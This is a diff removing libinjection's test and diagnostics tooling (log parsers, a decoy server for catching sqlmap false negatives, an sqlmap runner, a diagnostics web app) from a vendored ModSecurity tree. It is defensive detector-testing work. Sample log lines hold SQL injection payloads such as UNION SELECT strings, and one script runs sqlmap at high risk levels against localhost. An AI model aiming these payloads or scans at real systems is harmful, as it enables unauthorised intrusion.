# with the same lifetime as sstate (above)
try:
targetutf8 = target.encode('utf-8')
#targetutf8 = target
except UnicodeDecodeError, e:
targetutf8 = target
#if type(target) == str:
# sys.stderr.write("Target is a string\n")
#if type(target) == unicode:
# sys.stderr.write("Target is unicde\n")
#sys.stderr.write("OOps: {0}\n".format(e))
#sys.stderr.write("Encode error: {0}\n".format(target))
try:
libinjection.sqli_init(sstate, targetutf8, 0)
except TypeError:
sys.stderr.write("fail in decode: {0}".format(targetutf8))
if type(target) == str:
sys.stderr.write("Target is a string\n")
if type(target) == unicode:
sys.stderr.write("Target is unicde\n")
return None
sqli = bool(libinjection.is_sqli(sstate))
return (target, sqli, sstate.fingerprint, data['remote_addr'])
if __name__ == '__main__':
s = """
174.7.27.149 - - [29/Jul/2013:01:30:19 +0000] "GET /diagnostics?id=x|x||1&type=fingerprints HTTP/1.1" 200 1327 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36" "-"
"""
s = """
{"timestamp":1371091563,"remote_ip":"219.110.171.2","request":"/diagnostics?id=1+UNION+ALL+SELECT+1<<<&type=fingerprints","method":"GET","status":200,"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1","referrer":"https://libinjection.client9.com/diagnostics","duration_usec":160518 }
{"timestamp":1371091563,"remote_ip":"219.110.171.2","request":"/diagnostics?id=2+UNION+ALL+SELECT+1<<<&type=fingerprints","method":"GET","status":200,"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1","referrer":"https://libinjection.client9.com/diagnostics","duration_usec":160518 }
"""
if len(sys.argv) == 2:
fh = open(sys.argv[1], 'r')
else:
fh = sys.stdin
targets = set()
table = []
for line in fh:
parts = doline(line.strip())
if parts is None:
continue
# help it render in HTML
if parts[0] in targets:
continue
else:
targets.add(parts[0])
# add link
# add form that might render ok in HTML
# is sqli
# fingerprint
table.append( (
"/diagnostics?id=" + url_escape(parts[0]),
breakify(parts[0].replace(',', ', ').replace('/*', ' /*')),
parts[1],
parts[2],
parts[3]
)
)
table = reversed(table)
loader = template.Loader(".")
txt = loader.load("logtable.html").generate(
table=table,
now = str(datetime.datetime.now()),
ssl_protocol='',
ssl_cipher=''
)
print txt

8
src/deps/src/ModSecurity/others/libinjection/misc/mdgen.sh
View File

@ -1,8 +0,0 @@
#!/bin/bash
fname=$1
echo '{% extends "base.html" %}'
echo '{% block body %}'
#github-markup $fname
curl -H 'Content-Type: text/x-markdown' --data-binary @$fname https://api.github.com/markdown/raw
echo '{% end %}'

79
src/deps/src/ModSecurity/others/libinjection/misc/modsecurity-merge.sh
View File

@ -1,79 +0,0 @@
#!/bin/bash
#
# Sync ModSecurity / libinjection
#
# explode on error
set -e
#
# CLONE LIBINJECTION
#
if [ ! -d libinjection ]; then
git clone https://github.com/client9/libinjection.git
else
(cd libinjection; git pull)
fi
pwd
#
# CLONE MODSECURITY
#
if [ ! -d ModSecurity ]; then
git clone https://github.com/client9/ModSecurity.git
else
( cd ModSecurity; git pull )
fi
pwd
#
# Use right branch
#
(cd ModSecurity; git checkout remotes/trunk )
pwd
#
# COPY IN NEW LIBINJECTION
#
cp libinjection/COPYING.txt ModSecurity/apache2/
cp libinjection/c/libinjection.h ModSecurity/apache2/libinjection
cp libinjection/c/libinjection_sqli.c ModSecurity/apache2/libinjection
cp libinjection/c/libinjection_sqli.h ModSecurity/apache2/libinjection
cp libinjection/c/libinjection_sqli_data.h ModSecurity/apache2/libinjection
#
# REGENERATE / BUILD
#
cd ModSecurity
./autogen.sh
./configure
make
make distclean
#
# ADD NEW BITS
#
git add apache2/libinjection/COPYING.txt
git add apache2/libinjection/libinjection.h
git add apache2/libinjection/libinjection_sqli.h
git add apache2/libinjection/libinjection_sqli.c
git add apache2/libinjection/libinjection_sqli_data.h
# this file seems to get modified, reset just to be safe
git checkout standalone/Makefile.in
git commit -m 'libinjection sync'
#
# PUSH TO SPECIAL BRANCH
#
echo "pushing to remotes/trunk"
git push origin remotes/trunk
#
# PROFIT
#

47
src/deps/src/ModSecurity/others/libinjection/misc/mysql_implicit_tests.py
View File

@ -1,47 +0,0 @@
#!/usr/bin/python
mysql_ops = (
'AND',
'&&',
'=',
'&',
'|',
'^',
'DIV',
'/',
'<=>',
'>=',
'>',
'<<',
'<=',
'<',
'LIKE',
'-',
'%',
'MOD',
'!=',
'<>',
'NOT LIKE',
'NOT REGEXP',
'OR',
'||',
'+',
'REGEXP',
'>>',
'RLIKE',
'NOT RLIKE',
'SOUNDS LIKE',
'*',
'XOR'
)
print '# mysql implicit conversions tests'
for op in mysql_ops:
if op == '+':
op = '%2B'
print "A' {0} 'B".format(op)
print "A '{0}' B".format(op)
print "'{0}'".format(op)
print "' {0} '".format(op)

111
src/deps/src/ModSecurity/others/libinjection/misc/nullserver.py
View File

@ -1,111 +0,0 @@
#!/usr/bin/env python
# A 'nullserver' that accepts input and generates output
# to trick sqlmap into thinking it's a database-driven site
#
import sys
import logging
import urllib
import tornado.httpserver
import tornado.ioloop
import tornado.web
import libinjection
class ShutdownHandler(tornado.web.RequestHandler):
def get(self):
global fd
fd.close()
sys.exit(0)
class CountHandler(tornado.web.RequestHandler):
def get(self):
global count
self.write(str(count) + "\n")
def boring(arg):
if arg == '':
return True
if arg == 'foo':
return True
if arg == 'NULL':
return True
try:
float(arg)
return True
except ValueError:
pass
return False;
class NullHandler(tornado.web.RequestHandler):
def get(self):
global fd
global count
params = self.request.arguments.get('id', [])
sqli = False
if len(params) == 0 or (len(params) == 1 and boring(params[0])):
# if no args, or a single value with uninteresting input
# then just exit
self.write("<html><head><title>safe</title></head><body></body></html>")
return
for arg in params:
sqli = libinjection.detectsqli(arg)
if sqli:
break
# we didn't detect it :-(
if not sqli:
count += 1
args = [ arg.strip() for arg in params ]
#fd.write(' | '.join(args) + "\n")
for arg in args:
extra = {}
sqli = libinjection.detectsqli(arg, extra)
logging.error("\t" + arg + "\t" + str(sqli) + "\t" + extra['fingerprint'] + "\n")
#for arg in param:
# fd.write(arg + "\n")
# #fd.write(urllib.quote_plus(arg) + "\n")
self.set_status(500)
self.write("<html><head><title>safe</title></head><body></body></html>")
else:
self.write("<html><head><title>sqli</title></head><body></body></html>")
import os
settings = {
"static_path": os.path.join(os.path.dirname(__file__), "static"),
"cookie_secret": "yo mama sayz=",
"xsrf_cookies": True,
"gzip": False
}
application = tornado.web.Application([
(r"/null", NullHandler),
(r"/shutdown", ShutdownHandler),
(r"/count", CountHandler)
], **settings)
if __name__ == "__main__":
global fd
global count
count = 0
fd = open('./sqlmap-false-negatives.txt', 'w')
import tornado.options
#tornado.options.parse_config_file("/etc/server.conf")
tornado.options.parse_command_line()
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(8888)
tornado.ioloop.IOLoop.instance().start()

29
src/deps/src/ModSecurity/others/libinjection/misc/run_sqlmap.sh
View File

@ -1,29 +0,0 @@
#!/bin/bash
# Starts a bogus webserver that logs all input
# Then runs sqlmap
#
./nullserver.py --logging=none &
if [ ! -d "sqlmap" ]; then
git clone https://github.com/sqlmapproject/sqlmap.git
else
(cd sqlmap; git pull)
fi
SQLMAP=./sqlmap/sqlmap.py
URL=http://127.0.0.1:8888
HPP=
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1234.5
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=foo
HPP=--hpp
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1234.5
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=foo
curl -o /dev/null ${URL}/shutdown

339
src/deps/src/ModSecurity/others/libinjection/misc/sqliserver.py
View File

@ -1,339 +0,0 @@
#!/usr/bin/env python
#
#
#
import datetime
import sys
import logging
import urllib
import urlparse
try:
import libinjection
except:
pass
from tornado import template
import tornado.httpserver
import tornado.ioloop
import tornado.web
import tornado.wsgi
import tornado.escape
import tornado.options
def breakapart(s):
""" attempts to add spaces in a SQLi so it renders nicely on the webpage
"""
return s.replace(',', ', ').replace('/*',' /*')
# http://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks-in-python
def chunks(l, n):
""" Yield successive n-sized chunks from l.
"""
for i in xrange(0, len(l), n):
yield l[i:i+n]
def breakify(s):
output = ""
for c in chunks(s, 20):
output += c
if ' ' not in c:
output += ' '
return output
def print_token_string(tok):
"""
returns the value of token, handling opening and closing quote characters
"""
out = ''
if tok.str_open != '\0':
out += tok.str_open
out += tok.val
if tok.str_close != '\0':
out += tok.str_close
return out
def print_token(tok):
"""
prints a token for use in unit testing
"""
out = ''
if tok.type == 's':
out += print_token_string(tok)
elif tok.type == 'v':
vc = tok.count;
if vc == 1:
out += '@'
elif vc == 2:
out += '@@'
out += print_token_string(tok)
else:
out += tok.val
return (tok.type, out)
def alltokens(val, flags):
if flags & libinjection.FLAG_QUOTE_SINGLE:
contextstr = 'single'
elif flags & libinjection.FLAG_QUOTE_DOUBLE:
contextstr = 'double'
else:
contextstr = 'none'
if flags & libinjection.FLAG_SQL_ANSI:
commentstr = 'ansi'
elif flags & libinjection.FLAG_SQL_MYSQL:
commentstr = 'mysql'
else:
raise RuntimeException("bad quote context")
parse = {
'comment': commentstr,
'quote': contextstr
}
args = []
sqlstate = libinjection.sqli_state()
libinjection.sqli_init(sqlstate, val, flags)
count = 0
while count < 25:
count += 1
ok = libinjection.sqli_tokenize(sqlstate)
if ok == 0:
break
args.append(print_token(sqlstate.current))
parse['tokens'] = args
args = []
fingerprint = libinjection.sqli_fingerprint(sqlstate, flags)
for i in range(len(sqlstate.fingerprint)):
args.append(print_token(libinjection.sqli_get_token(sqlstate,i)))
parse['folds'] = args
parse['sqli'] = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
parse['fingerprint'] = fingerprint
# todo add stats
return parse
class PageHandler(tornado.web.RequestHandler):
def get(self, pagename):
if pagename == '':
pagename = 'home'
self.add_header('X-Content-Type-Options', 'nosniff')
self.add_header('X-XSS-Protection', '0')
self.render(
pagename + '.html',
title = pagename.replace('-',' '),
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
)
class XssTestHandler(tornado.web.RequestHandler):
def get(self):
settings = self.application.settings
ldr = template.Loader(".")
args = ['', '', '', '', '', '', '', '', '', '']
qsl = [ x.split('=', 1) for x in self.request.query.split('&') ]
for kv in qsl:
print kv
try:
index = int(kv[0])
val = tornado.escape.url_unescape(kv[1])
print "XXX", index, val
args[index] = val
except Exception,e:
print e
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
self.add_header('Pragma', 'no-cache')
self.add_header('Expires', '0')
self.add_header('X-Content-Type-Options', 'nosniff')
self.add_header('X-XSS-Protection', '0')
self.write(ldr.load('xsstest.html').generate(args=args))
class DaysSinceHandler(tornado.web.RequestHandler):
def get(self):
lastevasion = datetime.date(2013, 9, 12)
today = datetime.date.today()
daynum = (today - lastevasion).days
if daynum < 10:
days = "00" + str(daynum)
elif daynum < 100:
days = "0" + str(daynum)
else:
days = str(daynum)
self.render(
"days-since-last-bypass.html",
title='libinjection: Days Since Last Bypass',
days=days,
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
)
class NullHandler(tornado.web.RequestHandler):
def get(self):
arg = self.request.arguments.get('type', [])
if len(arg) > 0 and arg[0] == 'tokens':
return self.get_tokens()
else:
return self.get_fingerprints()
def get_tokens(self):
ids = self.request.arguments.get('id', [])
if len(ids) == 1:
formvalue = ids[0]
else:
formvalue = ''
val = urllib.unquote(formvalue)
parsed = []
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_ANSI))
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_MYSQL))
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_ANSI))
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_MYSQL))
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_DOUBLE | libinjection.FLAG_SQL_MYSQL))
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
self.add_header('Pragma', 'no-cache')
self.add_header('Expires', '0')
self.add_header('X-Content-Type-Options', 'nosniff')
self.add_header('X-XSS-Protection', '0')
self.render("tokens.html",
title='libjection sqli token parsing diagnostics',
version = libinjection.version(),
parsed=parsed,
formvalue=val,
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
)
def get_fingerprints(self):
#unquote = urllib.unquote
#detectsqli = libinjection.detectsqli
ids = self.request.arguments.get('id', [])
if len(ids) == 1:
formvalue = ids[0]
else:
formvalue = ''
args = []
extra = {}
qssqli = False
sqlstate = libinjection.sqli_state()
allfp = {}
for name,values in self.request.arguments.iteritems():
if name == 'type':
continue
fps = []
val = values[0]
val = urllib.unquote(val)
if len(val) == 0:
continue
libinjection.sqli_init(sqlstate, val, 0)
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_ANSI)
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
fps.append(['unquoted', 'ansi', issqli, pat])
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_MYSQL)
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
fps.append(['unquoted', 'mysql', issqli, pat])
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_ANSI)
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
fps.append(['single', 'ansi', issqli, pat])
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_MYSQL)
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
fps.append(['single', 'mysql', issqli, pat])
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_DOUBLE | libinjection.FLAG_SQL_MYSQL)
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
fps.append(['double', 'mysql', issqli, pat])
allfp[name] = {
'value': breakify(breakapart(val)),
'fingerprints': fps
}
for name,values in self.request.arguments.iteritems():
if name == 'type':
continue
for val in values:
# do it one more time include cut-n-paste was already url-encoded
val = urllib.unquote(val)
if len(val) == 0:
continue
# swig returns 1/0, convert to True False
libinjection.sqli_init(sqlstate, val, 0)
issqli = bool(libinjection.is_sqli(sqlstate))
# True if any issqli values are true
qssqli = qssqli or issqli
val = breakapart(val)
pat = sqlstate.fingerprint
if not issqli:
pat = 'see below'
args.append([name, val, issqli, pat])
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
self.add_header('Pragma', 'no-cache')
self.add_header('Expires', '0')
self.add_header('X-Content-Type-Options', 'nosniff')
self.add_header('X-XSS-Protection', '0')
self.render("form.html",
title='libjection sqli diagnostic',
version = libinjection.version(),
is_sqli=qssqli,
args=args,
allfp = allfp,
formvalue=formvalue,
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
)
import os
settings = {
"static_path": os.path.join(os.path.dirname(__file__), "static"),
"template_path": os.path.join(os.path.dirname(__file__), "."),
"xsrf_cookies": False,
"gzip": False
}
application = tornado.web.Application([
(r"/diagnostics", NullHandler),
(r'/xsstest', XssTestHandler),
(r'/bootstrap/(.*)', tornado.web.StaticFileHandler, {'path': '/opt/bootstrap' }),
(r'/jquery/(.*)', tornado.web.StaticFileHandler, {'path': '/opt/jquery' }),
(r'/robots.txt', tornado.web.StaticFileHandler, {'path': os.path.join(os.path.dirname(__file__), "static")}),
(r'/favicon.ico', tornado.web.StaticFileHandler, {'path': os.path.join(os.path.dirname(__file__), "static")}),
(r"/([a-z-]*)", PageHandler)
], **settings)
if __name__ == "__main__":
tornado.options.parse_command_line()
logging.basicConfig(level=logging.DEBUG, format="%(asctime)s %(process)d %(message)s")
application.listen(8888)
tornado.ioloop.IOLoop.instance().start()

BIN
src/deps/src/ModSecurity/others/libinjection/misc/static/favicon.gif
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 1.9 KiB

BIN
src/deps/src/ModSecurity/others/libinjection/misc/static/favicon.ico
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 4.2 KiB

BIN
src/deps/src/ModSecurity/others/libinjection/misc/static/favicon.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 3.1 KiB

2
src/deps/src/ModSecurity/others/libinjection/misc/static/robots.txt
View File

@ -1,2 +0,0 @@
User-agent: *
Disallow:

13
src/deps/src/ModSecurity/others/libinjection/php/config.m4
View File

@ -1,13 +0,0 @@
dnl based on
dnl http://www.php.net/manual/en/internals2.buildsys.configunix.php
PHP_ARG_ENABLE(libinjection, for libinjection support,
[ --enable-libinjection Include libinjection])
dnl Check whether the extension is enabled at all
if test "$PHP_LIBINJECTION" != "no"; then
dnl Finally, tell the build system about the extension and what files are needed
PHP_NEW_EXTENSION(libinjection, libinjection_sqli.c libinjection_wrap.c, $ext_shared)
PHP_SUBST(LIBINJECTION_SHARED_LIBADD)
fi

Some files were not shown because too many files have changed in this diff Show More